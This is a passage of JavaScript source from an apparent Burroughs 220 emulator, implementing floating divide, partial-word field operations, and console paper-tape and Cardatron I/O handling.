exponent bias to the dividend exponent and check for underflow ax = this.bcdAdd(ax, 0x50, 3); timing += 0.085; if (ax < dx) { // Exponents differ by more than 50 -- underflow sign = 0; ax = this.bcdAdd(dx, ax, 3, 1, 1); this.A.set(0); this.R.set(0); } else { // Subtract the exponents and check for overflow ax = this.bcdAdd(dx, ax, 3, 1, 1); if (ax > 0x99) { this.OFT.set(1); sign = 0; this.A.set(am); } else { // Shift A+R 1 digit right (exponent adjustment occurs later ad = am%0x10; am = (am-ad)/0x10; rd = rm%0x10; rm = (rm-rd)/0x10 + ad*0x1000000000; // We now have the divisor in D (dm) and the dividend in A (am) & R (rm). // The value in am will become the remainder; the value in rm will become // the quotient. Go through a classic long-division cycle, repeatedly // subtracting the divisor from the dividend, counting subtractions until // underflow occurs, and shifting the divisor left one digit. // The 220 probably did not work quite the way that it has been mechanized // below, but we don't have sufficient technical details to know for sure. // The following is adapted from the 205 implementation. for (x=0; x<11; ++x) { // Repeatedly subtract D from A until we would get underflow. 
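// Editor's note: this is schoolbook decimal long division by repeated
// subtraction -- each pass below counts how many times the divisor can be
// subtracted from the current partial remainder, and that count (ad) becomes
// the next quotient digit rotated into rm.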
ad = 0; /********** DEBUG ********** console.log("FDV %2d Ax=%3s A=%11s R=%11s Dx=%2s D=%11s", x, (ax+0x1000).toString(16).substring(1), (am+0x100000000000).toString(16).substring(1), (rm+0x100000000000).toString(16).substring(1), (dx+0x1000).toString(16).substring(1), (dm+0x100000000000).toString(16).substring(1)); ***************************/ while (am >= dm) { am = this.bcdAdd(dm, am, 11, 1, 1); ++ad; count += tSign; } // Shift A & R to the left one digit, accumulating the quotient digit in R rd = (rm - rm%0x1000000000)/0x1000000000; rm = (rm%0x1000000000)*0x10 + ad; // Shift into remainder except on last digit. if (x < 10) { am = am*0x10 + rd; } tSign = -tSign; } // for x /********** DEBUG ********** console.log("FDV %2d Ax=%3s A=%11s R=%11s Dx=%2s D=%11s", x, (ax+0x1000).toString(16).substring(1), (am+0x100000000000).toString(16).substring(1), (rm+0x100000000000).toString(16).substring(1), (dx+0x1000).toString(16).substring(1), (dm+0x100000000000).toString(16).substring(1)); ***************************/ // Rotate the quotient and remainder for 10 digits to exchange registers for (x=0; x<10; ++x) { ad = am%0x10; rd = rm%0x10; rm = (rm - rd)/0x10 + ad*0x1000000000; am = (am - ad)/0x10 + rd*0x1000000000; } /********** DEBUG ********** console.log("FDV %2d Ax=%3s A=%11s R=%11s Dx=%2s D=%11s", 98, (ax+0x1000).toString(16).substring(1), (am+0x100000000000).toString(16).substring(1), (rm+0x100000000000).toString(16).substring(1), (dx+0x1000).toString(16).substring(1), (dm+0x100000000000).toString(16).substring(1)); ***************************/ if (am >=0x1000000000 && ax == 0x99) { this.OFT.set(1); this.A.set(am); this.R.set(rSign*0x10000000000 + rm); } else { if (am < 0x1000000000) { // Normalize one digit to the right ad = am%0x10; am = (am - ad)/0x10; rm = (rm - rm%0x10)/0x10 + ad*0x1000000000; } else { // Normalize two digits to the right and adjust exponent ad = am%0x100; am = (am - ad)/0x100; rm = (rm - rm%0x100)/0x100 + ad*0x100000000; ax = this.bcdAdd(ax, 1, 3); } /********** DEBUG ********** console.log("FDV %2d Ax=%3s A=%11s R=%11s Dx=%2s D=%11s", 99, (ax+0x1000).toString(16).substring(1), (am+0x100000000000).toString(16).substring(1), (rm+0x100000000000).toString(16).substring(1), (dx+0x1000).toString(16).substring(1), (dm+0x100000000000).toString(16).substring(1)); ***************************/ // Reconstruct the final product in the registers this.A.set((sign*0x100 + ax)*0x100000000 + am); this.R.set(rSign*0x10000000000 + rm); } timing += 4.075 + 0.060*count; } } // Set the registers and toggles for display this.AX.set(ax); this.DX.set(dx); this.D.set(dm); } this.SGT.set(sign); this.DST.set(dSign); this.opTime = timing; }; /*********************************************************************** * Partial-Word Operations * ***********************************************************************/ /**************************************/ B220Processor.prototype.compareField = function compareField() { /* Implements CFA/CFR (18). Compares the value in either the A or R register to a word in memory, either whole word or a designated partial field, by subtracting the respective memory digits from the register digits. Sets the comparison indicators (UET, HIT) to indicate whether the register field is LOW (UET=1, HIT=0), EQUAL (UET=0, HIT=1), or HIGH (UET=1, HIT=1) with respect to the memory field. Note that the sign digit, if included in the comparison is handled in a very strange fashion -- see the discussion in the 220 Operational Characteristics manual for the truly gruesome details. 
And no, I didn't get this right the first time, nor the second, nor the third */ var adder = 0; // current adder digit var carry = 1; // carry flag defaults to 1, since we're subtracting var compl = 1; // do complement addition by default, since we're subtracting var dd; // current memory (D-register) digit var dSign = 0; // memory (D-register) sign var dw; // memory (D-register) word var high = 1; // initialize compare toggles to EQUAL var L; // partial-word length var rSign; // register sign digit var rd; // current register digit var rw; // register word value var s; // partial-word "s" digit var sign = 1; // default sign is negative, since we're subtracting var unequal = 0; // initialize compare toggles to EQUAL this.opTime = 0.150; this.E.set(this.CADDR); this.UET.set(0); this.HIT.set(0); this.readMemory(); if (!this.MET.value) { this.SUT.set(1); dw = this.IB.value; this.D.set(dw); if (this.CCONTROL%0x10 == 1) { rw = this.R.value; // CFR: Compare Field R } else { rw = this.A.value; // CFA: Compare Field A } // Determine field lengths for partial- or whole-word comparison. if (!(this.CCONTROL & 0x10)) { // whole word s = 10; L = 11; } else { // partial word s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } } // If the sign digit is included in the comparison, set up for algebraic // comparison and the strange sign ordering. This is tricky. Basically, // the non-signed digits need to be compared in a signed, algebraic manner, // but the transformed sign digits need to be compared unsigned. Since the // compare is based on a signed subtraction, then if the original sign of // either of the operands indicates negative (1, 2, 3), we use the 9s- // complement of the transformed sign digit for that operand, converting // the unsigned compare of the transformed sign digits into a signed one. if (L > s) { // sign digit is included rSign = (rw - rw%0x10000000000)/0x10000000000; if (rSign < 8) { rSign ^= 3; } dSign = (dw - dw%0x10000000000)/0x10000000000; if (dSign < 8) { dSign ^= 3; } if (dSign > 2) { sign = 1; } else { // treat as negative sign = 0; dSign = 9-dSign; } if (rSign > 2) { compl = sign; } else { // treat as negative compl = 1-sign; rSign = 9-rSign; } carry = compl; rw = rw%0x10000000000 + rSign*0x10000000000; dw = dw%0x10000000000 + dSign*0x10000000000; } // Now go through a modified add cycle, subtracting the digit pairs using // 10s-complement addition, and marking the result unequal if any digits differ. this.DC.set(0x09); // set up to rotate through 11 digits do { rd = rw%0x10; dd = dw%0x10; if (s < 10) { // positition to the "s" digit ++s; } else if (L > 0) { // compare digits in the sL field --L; this.X.set(rd); // for display only this.Y.set(dd); adder = (compl ? 9-rd : rd) + dd + carry; if (adder < 10) { // decimal correct the adder carry = 0; } else { carry = 1; adder -= 10; } this.Z.set(adder); // for display only if (adder) { // if the adder is not zero, unequal = 1; // result will be unequal, determined by sign } } else { // Ignore any digits after L is exhausted this.DC.set(0x19); // (the 220 didn't quit early like this, though) } // Shift both words right (no need to rotate them) rw = (rw-rd)/0x10; dw = (dw-dd)/0x10; this.DC.inc(); } while (this.DC.value < 0x20) // If there is a final carry, we keep the original sign; if we are not complementing, // force an unequal result. If there is no final carry, we complement the result sign. 
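        // Illustrative two-digit example of the rule above: 7 - 3 is formed as
        // 7 + 96 + 1 = 104, leaving a final carry, while 3 - 7 is formed as
        // 3 + 92 + 1 = 96 with no carry (96 being the 10s-complement of 4),
        // which is why the result sign is reversed in the no-carry case.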
if (carry) { if (!compl) { unequal = 1; } } else { sign = 1-sign; } // Set the console lamps and toggles to the result. if (unequal) { // result is unequal, sign determines low/high high = 1-sign; // negative=low, positive=high this.compareEqualLamp.set(0); this.compareLowLamp.set(1-high); this.compareHighLamp.set(high); } else { this.compareEqualLamp.set(1); this.compareLowLamp.set(0); this.compareHighLamp.set(0); } this.DST.set(dSign%2); this.SGT.set(sign); this.HIT.set(high); this.UET.set(unequal); this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { this.setProgramCheck(1); } } }; /**************************************/ B220Processor.prototype.increaseFieldLocation = function increaseFieldLocation() { /* Implements IFL (26). Increments a designated partial field in a memory word by the two-digit value in (42) of the C register */ var adder = 0; // current adder digit var carry = 0; // carry flag defaults to 0, since we're adding var dd; // current memory (D-register) digit var dw; // memory (D-register) word var L; // partial-word length var rd; // current increase digit var rw; // increase value var s; // partial-word "s" digit this.opTime = 0.160; this.SUT.set(0); this.DST.set(0); this.SGT.set(0); this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { dw = this.IB.value; this.D.set(dw); rw = this.CCONTROL%0x100; // increase value s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } // Now go through a modified add cycle for each digit. this.DC.set(0x09); // set up to rotate 11 digits while (this.DC.value < 0x20) { dd = dw%0x10; // get digit from memory value if (s < 10) { // positition to the "s" digit ++s; adder = dd; // just copy the digit } else if (L > 0) { // operate on the partial-word field --L; rd = rw%0x10; // get digit from increase value this.X.set(rd); // for display only this.Y.set(dd); adder = rd + dd + carry; if (adder < 10) { // decimal correct the adder carry = 0; } else { carry = 1; adder -= 10; } this.Z.set(adder); // for display only rw = (rw-rd)/0x10; // shift the increase value right } else { adder = dd; // copy any remaining digits after L is exhausted } dw = (dw-dd)/0x10 + adder*0x10000000000; // rotate result into memory value this.DC.inc(); } // while DC < 20 this.D.set(dw); this.IB.set(dw); this.C10.set(carry); // set carry toggle if (carry) { this.OFT.set(1); // set overflow if there's a carry } this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { // check whether L was decremented to zero this.setProgramCheck(1); } else { this.writeMemory(); } } }; /**************************************/ B220Processor.prototype.decreaseFieldLocation = function decreaseFieldLocation(loadB) { /* Implements DFL/DLB (27, 28). 
Decrements a designated partial field in a memory word by the two-digit value in (42) of the C register */ var adder = 0; // current adder digit var carry = 1; // carry flag defaults to 1, since we're subtracting var dd; // current memory (D-register) digit var dw; // memory (D-register) word var L; // partial-word length var rd; // current decrease digit var rw; // decrease value var s; // partial-word "s" digit this.opTime = 0.160; this.SUT.set(1); this.DST.set(1); this.SGT.set(0); this.RPT.set(0); if (loadB) { this.B.set(0); } this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { dw = this.IB.value; this.D.set(dw); rw = this.CCONTROL%0x100; // decrease value s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } // Now go through a modified add cycle for each digit. this.DC.set(0x09); // set up to rotate 11 digits while (this.DC.value < 0x20) { dd = dw%0x10; // get digit from memory value if (s < 10) { // positition to the "s" digit ++s; adder = dd; // just copy the digit } else if (L > 0) { // operate on the partial-word field --L; rd = rw%0x10; // get digit from decrease value this.X.set(rd); // for display only this.Y.set(dd); adder = 9 - rd + dd + carry; if (adder < 10) { // decimal correct the adder carry = 0; } else { carry = 1; adder -= 10; } this.Z.set(adder); // for display only rw = (rw-rd)/0x10; // shift the decrease value right if (loadB) { // shift adder digit into B if op=DLB this.B.value = (this.B.value - this.B.value%0x10)/0x10 + adder*0x1000; } } else { adder = dd; // copy any remaining digits after L is exhausted } dw = (dw-dd)/0x10 + adder*0x10000000000; // rotate result into memory value this.DC.inc(); } // while DC < 20 this.D.set(dw); this.IB.set(dw); this.C10.set(carry); // set carry toggle if (carry) { this.RPT.set(1); // set repeat toggle if no underflow } if (loadB) { // set B register if op=DLB this.B.set(this.B.value); } this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { // check whether L was decremented to zero this.setProgramCheck(1); } else { this.writeMemory(); } } }; /**************************************/ B220Processor.prototype.branchField = function branchField(regValue) { /* Implements BFA/BFR (36, 37). Compares digits of a designated partial field in the A or R register word to a rotating two-digit value in (42) of the C register */ var adder = 0; // current adder digit var carry = 1; // carry flag defaults to 1, since we're subtracting var dd; // current pattern digit var dw; // rotating 2-digit pattern value var equal = 1; // start out assuming equality var L; // partial-word length var rd; // current register digit var rw = regValue; // register value var s; // partial-word "s" digit this.opTime = 0.075; this.SUT.set(1); dw = this.CCONTROL%0x100; // 2-digit pattern to compare s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } // Now position the word and compare digits to the rotating pattern. 
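        // (With the sL designator as decoded above, the loop below skips the
        // low-order 10-s digits of the register word and then compares the next
        // L digits against the repeating two-digit pattern; an s or L of zero is
        // treated as 10. Illustrative: s=4, L=2 compares only digits 7 and 8,
        // counting from the low-order end.)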
this.DC.set(0x09); // set up to rotate 11 digits while (this.DC.value < 0x20) { rd = rw%0x10; // get digit from register value if (s < 10) { // positition to the "s" digit ++s; // just ignore any initial digits } else if (L > 0) { // operate on the partial-word field --L; dd = dw%0x10; // get digit from increase value this.X.set(rd); // for display only this.Y.set(dd); adder = 9 - rd + dd + carry; if (adder < 10) { // decimal correct the adder carry = 0; } else { carry = 1; adder -= 10; } this.Z.set(adder); // for display only dw = (dw-dd)/0x10 + dd*0x10;// rotate the 2-digit pattern if (adder) { equal = 0; // if the adder is not zero, fields are unequal } } else { // just ignore any remaining digits after L is exhausted } rw = (rw-rd)/0x10; // shift register word right (no need to rotate it) this.DC.inc(); } // while DC < 20 this.C10.set(carry); // set carry toggle, for display only if (equal) { // if equality exists, branch this.opTime += 0.020; this.P.set(this.CADDR); } this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { // check whether L was decremented to zero this.setProgramCheck(1); } }; /**************************************/ B220Processor.prototype.storeRegister = function storeRegister() { /* Implements STA/STR/STB (40). Stores a whole word or a designated partial field in a memory word based on the sL (22) digits of the C register */ var adder; // current adder digit var dd; // current memory (D-register) digit var dw; // memory (D-register) word var L; // partial-word length var rd; // current increase digit var rw; // increase value var s; // partial-word "s" digit var xd; // current D-register digit var xw = 0; // word used to construct the D-register value this.opTime = 0.100; this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { switch (this.CCONTROL%0x10) { case 1: // STR: Store R rw = this.R.value; break; case 2: // STB: Store B rw = this.B.value; break; default: // STA: Store A rw = this.A.value; break; } // switch if ((this.CCONTROL & 0x10) == 0) { // whole-word store this.D.set(rw); this.IB.set(rw); s = L = 0; } else { // partial-word store this.D.set(0); dw = this.IB.value; s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } // Now position the field and copy the digits this.DC.set(0x09); // set up to rotate 11 digits while (this.DC.value < 0x20) { rd = rw%0x10; // get digit from register value dd = dw%0x10; // get digit from memory value if (s < 10) { // positition to the "s" digit ++s; adder = dd; // just copy the memory digit xd = 0; } else if (L > 0) { // operate on the partial-word field --L; adder = rd; // copy digit from register into memory value xd = rd; } else { adder = dd; // just copy any remaining memory digits after L is exhausted xd = 0; } dw = (dw-dd)/0x10 + adder*0x10000000000; // rotate result digit into memory value rw = (rw-rd)/0x10; // shift register value right (no need to rotate it) xw = xw/0x10 + xd*0x10000000000; // copy zero or register digit into D-register this.DC.inc(); } // while DC < 20 this.D.set(xw); this.IB.set(dw); } this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { // check whether L was decremented to zero this.setProgramCheck(1); } else { this.writeMemory(); } } }; /*********************************************************************** * Console I/O Module * 
***********************************************************************/ /**************************************/ B220Processor.prototype.keyboardAction = function keyboardAction(d) { /* Receives a single digit from the Console keyboard. Non-negative values of d indicate decimal digit keys and are shifted into the low-order digit of D. Negative values of d indicate function keys: -1 = ADD key pressed -2 = C key pressed -3 = E key pressed -4 = EXAM key pressed -5 = ENT key pressed -6 = STEP key pressed */ var word = this.D.value; if (!this.RUT.value) { // make sure we're not running switch (d) { case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: case 8: case 9: this.D.set((this.D.value%0x10000000000)*0x10 + d); break; case -1: // ADD key pressed this.keyboardAdd(); break; case -2: // C key pressed, do D -> C this.fetchWordToC(word); break; case -3: // E key pressed, do D -> E this.E.set(word%0x10000); this.D.set(0); break; case -4: // EXAM key pressed, memory -> D this.readMemory(); if (!this.MET.value) { // invalid address this.E.inc(); this.D.set(this.IB.value); } break; case -5: // ENT key pressed, D -> memory this.IB.set(word); this.writeMemory(); if (!this.MET.value) { this.E.inc(); } break; case -6: // STEP key pressed this.step(); break; } // switch d } }; /**************************************/ B220Processor.prototype.keyboardAdd = function keyboardAdd() { /* Algebraically add the addend (D) to the augend (A), returning the result in A. Similar to integerAdd(), except (a) the processor must not be running, (b) there is no reference to memory, (c) the addend comes from D instead of IB, (d) subtract is not possible, although the numbers may be signed, and (e) the processor is returned to running status after the add completes. No timing is accumulated because the processor has been stopped */ var am = this.A.value % 0x10000000000; // augend mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var compl; // complement addition required var dm = this.D.value % 0x10000000000; // addend mantissa var dSign = ((this.D.value - dm)/0x10000000000)%2; var sign = dSign; // local copy of sign toggle if (!this.RUT.value) { // we must be stopped this.SUT.set(0); compl = (aSign^sign); am = this.bcdAdd(am, dm, 11, compl, compl); // Now examine the resulting sign (still in the adder) to see if we // have overflow or need to recomplement the result. 
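        // Illustrative: adding A=+5 and D=-3 complements the 5 in the adder,
        // leaving an adder sign digit of 9, so the sign toggle is flipped and
        // the mantissa recomplemented to 2 (result +2); adding A=+3 and D=-5
        // leaves an adder sign digit of 0, so the addend's sign is simply
        // kept (result -2).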
switch (this.Z.value) { case 0: am += sign*0x10000000000; break; case 1: am += (sign-1)*0x10000000000; this.OFT.set(1); break; default: // sign is 9 // reverse the sign toggle and recomplement the result (virtually adding to the zeroed dm) sign = 1-sign; am = this.bcdAdd(am, 0, 11, 1, 1); // after recomplementing, set the correct sign (adder still contains sign of result) am += (sign - this.Z.value)*0x10000000000; break; } // switch this.Z.value if (am%0x10000000000 == 0) { am = aSign*0x10000000000; } // Set toggles for display purposes and return the result this.DST.set(dSign); this.SGT.set(sign); this.A.set(am); this.start(); } }; /**************************************/ B220Processor.prototype.consoleOutputSign = function consoleOutputSign(printSign) { /* Outputs the sign character for a SPO (09) command and sets up to output the first number digit */ var d; var w; this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared d = this.bcdAdd(this.CCONTROL, 0x990, 3); // decrement word count this.CCONTROL += d - this.CCONTROL%0x1000; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address this.ioComplete(true); } else { this.D.set(this.IB.value); this.execClock += 0.070; // estimate for memory access and rotation w = this.D.value%0x10000000000; d = (this.D.value - w)/0x10000000000; // get the sign digit this.D.set(w*0x10 + d); // rotate D+sign left one this.DC.set(0x10); // set up for 10 more digits this.DPT.set(this.CCONTROL%0x10 == 1 && this.COP == 0x09); this.LT1.set(this.LEADINGZEROESSW); // use LT1 for leading-zero suppression (probably not accurate) this.EWT.set(0); this.PZT.set(d == 2 && !this.HOLDPZTZEROSW); this.PA.set(0x80 + d); // translate numerically this.asyncOn(); printSign(this.PA.value, this.boundConsoleOutputChar); } } }; /**************************************/ B220Processor.prototype.consoleOutputChar = function consoleOutputChar(printChar) { /* Outputs the next character code for a SPO (09) command and sets up to output the next number digit. 
If the Shift Counter is already at 20, terminates the output operation and sends a Finish signal */ var d; var w; this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared if (this.EWT.value) { if (this.CCONTROL%0x1000 < 0x10) { this.asyncOn(); printChar(0x35, this.boundConsoleOutputFinished); } else { this.C.inc(); this.CADDR = this.C.value%0x10000; this.asyncOn(); printChar(0x35, this.boundConsoleOutputSign); } } else if (this.PZT.value) { // Output alphabetically w = this.D.value % 0x1000000000; d = (this.D.value - w)/0x1000000000; // get next 2 digits this.D.set(w*0x100 + d); // rotate D+sign left by two this.execClock += 0.060; // estimate for rotation this.DC.inc(); // increment DC for two digits this.DC.inc(); this.PA.set(d); if (this.DC.value >= 0x20) { this.EWT.set(1); } this.asyncOn(); printChar(d, this.boundConsoleOutputChar); } else { // Output numerically if (this.DPT.value && !this.LEADINGZEROESSW) { // decimal point may be needed d = this.CCONTROL >>> 12; if (this.DC.value + d > 0x19) { this.DPT.set(0); this.LT1.set(0); // stop any zero-suppression this.PA.set(0x03); // decimal point code this.asyncOn(); printChar(0x03, this.boundConsoleOutputChar); return; // early exit } } do { // suppress leading zeroes if necessary w = this.D.value % 0x10000000000; d = (this.D.value - w)/0x10000000000; // get a digit this.D.value = w*0x10 + d; // rotate D+sign left by one this.execClock += 0.065; // estimate for rotation this.DC.inc(); } while (d == 0 && this.LT1.value && this.DC.value < 0x20); this.LT1.set(0); this.D.set(this.D.value); d += 0x80; // translate numerically this.PA.set(d); if (this.DC.value >= 0x20) { this.EWT.set(1); } this.asyncOn(); printChar(d, this.boundConsoleOutputChar); } } }; /**************************************/ B220Processor.prototype.consoleOutputFinished = function consoleOutputFinished() { /* Handles the final cycle of console output */ this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared this.EWT.set(0); this.ioComplete(true); } }; /**************************************/ B220Processor.prototype.consoleInputFinishWord = function consoleInputFinishWord(result) { /* Finishes the receipt of a word from the Console paper tape reader and either stores it in memory or shunts it to the C register for execution. Updates the C register as necessary and decides whether to initiate receipt of another word. 
Note that this routine does not do asyncOff -- that is handled by the caller */ var d; var w; if (this.sDigit) { // decrement word count d = this.bcdAdd(this.CCONTROL, 0x990, 3); this.CCONTROL += d - this.CCONTROL%0x1000; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); } if (this.COP != 0x05) { // read normal: sign digit in normal position w = this.D.value%0x10000000000; d = (this.D.value - w)/0x10000000000; } else { // read inverse: permute the sign digit d = this.D.value%0x10; w = (this.D.value - d)/0x10; this.D.set(w + d*0x10000000000); if (d == 2) { // alphanumeric translation is invalid for inverse mode this.setPaperTapeCheck(1); this.ioComplete(true); return; // >>> ALARM ERROR EXIT <<< } } if (this.rDigit & d & 0x08) { // B-modify word before storing this.D.set(w + (d&0x07)*0x10000000000); this.IB.set(this.D.value - w%0x10000 + this.bcdAdd(w, this.B.value, 4)); this.C10.set(0); } else { // store word as-is this.IB.set(this.D.value); } if (this.rDigit == 1 && (d & 0x0E) == 0x06) { // control word to C register this.ioComplete(false); // terminate I/O but do not restart Processor yet this.fetch(true); // set up to execute control word // Schedule the Processor to give the reader a chance to finish its operation. setCallback(this.mnemonic, this, 0, this.schedule); } else { // just store the word this.writeMemory(); if (this.MET.value) { // memory address error this.ioComplete(true); } else if (this.sDigit && this.CCONTROL%0x1000 < 0x10) { // word count exhausted this.ioComplete(true); } else { // initiate input of another word this.D.set(0); this.asyncOn(); if (this.COP == 0x05) { d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateInverse); } else { d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateNormal); } if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } } } }; /**************************************/ B220Processor.prototype.consoleInputInitiateNormal = function consoleInputInitiateNormal(result) { /* Initiates the receipt into a word of characters from the Console tape reader in normal (sign-first) mode. 
Increments the C register operand address, rotates the sign digit into the D register, and determines whether the word should be translated numerically or alphanumerically */ var code = result.code; this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared this.E.set(this.CADDR); this.C.inc(); this.CADDR = this.C.value%0x10000; switch (code) { case 0x17: // invalid character/parity error this.setPaperTapeCheck(1); this.ioComplete(true); break; case 0x35: // end-of-word this.consoleInputFinishWord(result); break; case 0x82: // sign=2, set alpha translation this.PZT.set(!this.HOLDPZTZEROSW); this.D.set(2); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); break; default: // anything else, set numeric translation this.PZT.set(0); if ((code & 0xF0) == 0x80) {// it's a numeric sign -- okay this.D.set(code%0x10); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else if (code == 0) { // we'll take a space as a zero this.D.set(0); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else { // sign is non-numeric -- invalid this.D.set(0); this.setPaperTapeCheck(1); this.ioComplete(true); } break; } // switch code } }; /**************************************/ B220Processor.prototype.consoleInputInitiateInverse = function consoleInputInitiateInverse(result) { /* Initiates the receipt into a word of characters from the Console tape reader in inverse (sign-last) mode. Increments the C register operand address, rotates the sign digit into the D register, and sets PZT for numeric translation */ var code = result.code; this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared this.E.set(this.CADDR); this.C.inc(); this.CADDR = this.C.value%0x10000; switch (code) { case 0x17: // invalid character/parity error this.setPaperTapeCheck(1); this.ioComplete(true); break; case 0x35: // end-of-word this.consoleInputFinishWord(result); break; default: // anything else, set numeric translation this.PZT.set(0); if ((code & 0xF0) == 0x80) {// it's a numeric code -- okay this.D.set(code%0x10); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else if (code == 0) { // we'll take a space as a zero this.D.set(0); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else { // digit is non-numeric -- invalid this.D.set(0); this.setPaperTapeCheck(1); this.ioComplete(true); } break; } // switch code } }; /**************************************/ B220Processor.prototype.consoleInputReceiveChar = function consoleInputReceiveChar(result) { /* Handles an input character coming from the Console paper-tape reader. result.code is the B220 character code read from the device. result.readChar is the callback function to request the next character. 
Data digits are rotated into the D register; end-of-word (0x35) codes are handled according to the sign digit in the D register */ var code = result.code; // character received var sign; // register sign digit var word; // register word less sign this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared switch (code) { case 0x17: // invalid character/parity error this.setPaperTapeCheck(1); this.ioComplete(true); break; case 0x35: // end-of-word this.consoleInputFinishWord(result); break; default: // anything else, accumulate digits in word if (this.PZT.value) { // alphanumeric translation this.D.set((this.D.value % 0x1000000000)*0x100 + code); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else { // numeric translation if ((code & 0xF0) == 0x80) {// it's a numeric code -- okay this.D.set((this.D.value % 0x10000000000)*0x10 + code%0x10); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else if (code == 0) { // we'll take a space as a zero this.D.set((this.D.value % 0x10000000000)*0x10); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else { // code is non-numeric -- invalid this.setPaperTapeCheck(1); this.ioComplete(true); } } break; } // switch code } }; /*********************************************************************** * Cardatron I/O Module * ***********************************************************************/ /**************************************/ B220Processor.prototype.cardatronOutputWord = function cardatronOutputWord() { /* Initiates a read of the next word from memory for output to the Cardatron Control Unit. Returns a negative number to stop transfer */ var word; this.asyncOff(); if (!this.AST.value) { // we've probably been cleared word = -1; } else if (this.MET.value) { // previous memory access error word = 0; } else { word = this.readMemory(); // address in E was previously set if (this.MET.value) { word = 0; } else { this.E.dec(); // step down to next memory address } this.execClock += 0.117; // time for full-word transfer } this.asyncOn(); return word; }; /**************************************/ B220Processor.prototype.cardatronOutputFinished = function cardatronOutputFinished() { /* Handles the final cycle of an I/O operation and restores this.execTime */ if (this.AST.value) { // if false, we've probably been cleared this.ioComplete(true); } }; /**************************************/ B220Processor.prototype.cardatronReceiveWord = function cardatronReceiveWord(word) { /* Handles a word coming from the Cardatron input unit. Negative values for the word indicates this is the last word and the I/O is finished. Otherwise, the word is stored into the D register and is handled according to the sign digit in the D register. The last word received (typically a "pusher" word of zeroes) is abandoned and not acted upon. 
Returns -1 if further data transfer is to be terminated, 0 otherwise */ var returnCode = 0; // default is to continue receiving var sign; // D-register sign digit this.asyncOff(); if (!this.AST.value) { // we've probably been cleared returnCode = -1; } else if (word < 0) { // Last word received -- finished with the I/O this.D.set(word-0x900000000000);// remove the finished signal; for display only, not stored this.ioComplete(true); returnCode = -1; } else if (this.MET.value) { // Memory error has occurred: just ignore further data from Cardatron this.asyncOn(); } else { // Full word accumulated -- process it and initialize for the next word this.D.set(word); word %= 0x10000000000; // strip the sign digit sign = (this.D.value - word)/0x10000000000; // get D-sign switch (sign) { case 0: // sign is 0-5: store word normally case 1: case 2: case 3: case 4: case 5: this.IB.set(this.D.value); this.writeMemory(); if (!this.MET.value) { this.E.dec(); // decrement memory address for next word } this.asyncOn(); break; case 6: // sign is 6, 7: execute control word case 7: if (this.vDigit & 0x01) { // input control words are inhibited this.IB.set(this.D.value); this.writeMemory(); // just store the word with its sign if (!this.MET.value) { this.E.dec(); // decrement memory address for next word } this.asyncOn(); } else { // input control words are executed this.IB.set(this.D.value); // move word to IB for use by fetch() this.ioComplete(false); // terminate I/O but do not restart Processor yet this.fetch(true); // set up to execute control word returnCode = -1; // stop further input from Cardatron // Schedule the Processor to give Cardatron a chance to finish its operation. setCallback(this.mnemonic, this, 0, this.schedule); } break; default: // sign is 8, 9: store word with optional B mod if (!(this.rDigit & 0x08)) { // no B-register modification this.IB.set(this.D.value); } else { // add B to low-order four digits of word word = word - word%0x10000 + this.bcdAdd(word, this.B.value, 4); this.C10.set(0); // reset carry toggle this.IB.set((sign%2)*0x10000000000 + word); } this.writeMemory(); if (!this.MET.value) { this.E.dec(); // decrement memory address for next word } this.asyncOn(); break; } // switch sign this.execClock += 0.117; // time for full-word transfer } return returnCode; }; /*********************************************************************** * Magnetic Tape I/O Module * ***********************************************************************/ /**************************************/ B220Processor.prototype.magTapeComplete = function magTapeComplete(control, word) { /* Call-back routine to signal 